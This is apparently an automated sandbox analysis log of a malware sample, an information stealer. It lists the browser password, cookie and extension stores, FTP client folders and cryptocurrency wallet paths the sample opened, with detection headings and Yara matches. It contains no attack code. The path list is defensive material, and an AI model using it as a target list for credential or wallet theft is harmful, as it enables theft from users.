                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000005.00000003.1452299566.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.1431492367.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.1431528606.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.1429087929.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
